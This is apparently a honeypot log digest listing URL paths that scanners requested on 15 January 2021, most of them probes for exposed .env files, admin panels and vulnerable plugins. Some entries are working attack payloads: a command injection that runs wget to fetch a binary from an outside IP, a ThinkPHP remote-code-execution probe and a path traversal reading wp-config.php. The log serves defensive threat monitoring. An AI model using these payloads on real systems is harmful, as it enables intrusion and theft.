File Access Bruteforce Attempts for 2021-01-15
Share on:
Jan 15, 2021
Reconnaissance
Last Updated: 18:01 GMT+8
- .env
- 45.155.205.0/
- CVE-2007-2722/
- HNAP1/
- TP/html/public/index.php
- TP/index.php
- TP/public/index.php
- admin/.env
- admin/includes/general.js
- admin/view/javascript/common.js
- administrator/
- administrator/help/en-GB/toc.json
- administrator/language/en-GB/install.xml
- ads.txt
- api/.env
- backup/wp-admin/
- blog/.env
- chkisg.htm%3FSip%3D1.1.1.1%20%7C%20wget%20http%3A//176.32.34.111%3A24791/dlink%20-O%20test
- config/getuser?index=0
- console/
- dns-query?dns=AAABAAABAAAAAAAAA3d3dwViYWlkdQNjb20AAAEAAQ
- elrekt.php
- env.txt
- favicon.ico
- fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media
- html/public/index.php
- humans.txt
- images/editor/separator.gif
- index.php
- index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP21
- jenkins/login
- js/header-rollup-554.js
- laravel/.env
- login
- manager/html
- misc/ajax.js
- owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
- phpmyAdmin/
- phpmyAdmin4.8.5/
- phpmyadmin/
- plugins/system/debug/debug.xml
- pmA/
- pmD/
- public/.env
- public/index.php
- shop/.env
- sites/.env
- solr/admin/info/system?wt=json
- storage/.env
- system/.env
- test/.env
- thinkphp/html/public/index.php
- vendor/.env
- vendor/phpunit/phpunit/build.xml
- vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
- wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
- wp-content/plugins/apikey/apikey.php
- wp-content/plugins/apikey/cursed.php
- wp-content/plugins/downloads-manager/img/unlock.gif
- wp-content/plugins/ioptimization/IOptimize.php?rchk
- wp-content/plugins/wp-file-manager/readme.txt
- wp-includes/css/css.php
- wp-includes/fonts/css.php
- wp-includes/js/jquery/jquery.js
- wp-login.php